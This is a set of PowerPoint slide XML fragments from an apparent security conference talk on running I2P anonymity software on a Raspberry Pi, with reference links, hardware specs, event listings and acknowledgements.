            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and Forums</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.raspberrypi.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Elinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Hub for Raspberry Pi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://elinux.org/R-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Pi_Hub</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Raspberry Pi Recipes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.irongeek.com/i.php?page=security/raspberry-pi-recipes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3784708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smtClean="0"/>
              <a:t>Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an I2P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Svartkast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the Raspberry Pi: Even more cheap hardware to leave on someone else's network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.irongeek.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/i.php?page=security/raspberry-pi-i2p-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>svartkast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Telecomix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Svartkast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>cryptoanarchy.org/wiki/Blackthrow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283029593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a:t>Selected Papers in Anonymity</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.freehaven.net/anonbib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I2P’s Threat Model Page</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.i2p2.de/how_threatmodel.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>General </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Darknets Talk</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.irongeek.com/i.php?page=videos/aide-winter-2011#Cipherspace/Darknets:_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>anonymizing_private_networks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>De-anonymizing I2P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.irongeek.com/i.php?page=security/darknets-i2p-identifying-hidden-servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.irongeek.com/i.php?page=videos/identifying-the-true-ip-network-identity-of-i2p-service-hosts-talk-adrian-crenshaw-blackhat-dc-2011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>forwarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.irongeek.com/i.php?page=videos/sshdynamicportforwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170582951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Conference organizers for having me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By buddies from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Derbycon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ISDPodcast</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open Icon Library for some of my images</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>openiconlibrary.sourceforge.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187528876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475px-Raspberry_Pi_Logo.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419600"/>
            <a:ext cx="1809750" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Raspberry_Pi_Phot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052" y="990600"/>
            <a:ext cx="3855720" cy="2891790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why I chose the Raspberry Pi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cheap,  $35.00 + S&amp;H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Small size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lost of folk hacking on it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GPIO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Should be readily available (someday)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Specs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	ARM1176JZF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-S 700 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MHz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Boots from SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>card </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>256 MB RAM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Broadcom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VideoCore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Graphics </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="626237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
            <a:ext cx="8229600" cy="817880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="762000"/>
            <a:ext cx="8229600" cy="5546725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="136525" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Derbycon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Sept 27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>-30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.derbycon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="136525" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Others</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="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685800"/>
            <a:ext cx="316528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6767" y="2057399"/>
            <a:ext cx="6880649" cy="2823933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858741" y="5262880"/>
            <a:ext cx="7391400" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="2">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://www.louisvilleinfosec.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://skydogcon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://hack3rcon.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://outerz0ne.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>://phreaknic.info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>http://notacon.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927416" y="2740361"/>
            <a:ext cx="369332" cy="2140971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="vert270" wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Photo Credits to KC (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>devauto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674075" y="2792106"/>
            <a:ext cx="369332" cy="2089226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="vert" wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Derbycon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> Art Credits to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>DigiP</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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Irongeek_ADC</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623303" y="3510605"/>
            <a:ext cx="5486902" cy="2716462"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="36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Straight Connect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1805571" y="4979536"/>
            <a:ext cx="990600" cy="1076207"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1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25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5807101" y="3829538"/>
            <a:ext cx="990600" cy="1076207"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2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34" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1783893" y="3829538"/>
            <a:ext cx="990600" cy="1076207"/>
            <a:chOff x="2675122" y="4648672"/>
            <a:chExt cx="990600" cy="1076207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3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37" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
